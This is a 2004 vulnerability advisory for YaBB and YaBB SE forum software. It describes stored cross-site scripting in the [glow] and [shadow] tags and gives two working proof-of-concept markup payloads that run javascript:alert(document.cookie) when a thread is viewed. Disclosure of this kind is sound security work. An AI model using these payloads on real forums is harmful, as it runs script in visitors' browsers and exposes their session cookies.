##################################################################### Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability Release Date : Mar 14,2004 Application : YaBB/YaBBse Test On : YaBB 1 Gold(SP1.3) YaBB SE 1.5.1 Final Vendor URL : http://www.yabbforum.com/ http://www.yabbse.org/ Discover : Cheng Peng Su(apple_soup_at_msn.com) ##################################################################### Proof of conecpt: The problem is in [glow] and [shadow] tag,yabb doesn't filter the charactor in this tag,attack needn't visitor to click any links,just when the vistor read the thread,XSS code will be executed. Exploit: [glow=red);background:url(javascript:alert(document.cookie));filte r:glow(color=red,2,300]Big Exploit[/glow] [shadow=red);background:url(javascript:alert(document.cookie));fil ter:shadow(color=red,left,300]Big Exploit[/shadow] Contact: Cheng Peng Su Class 1,Senior 2,High school attached to Wuhan University Wuhan,Hubei,China(430072) apple_soup_at_msn.com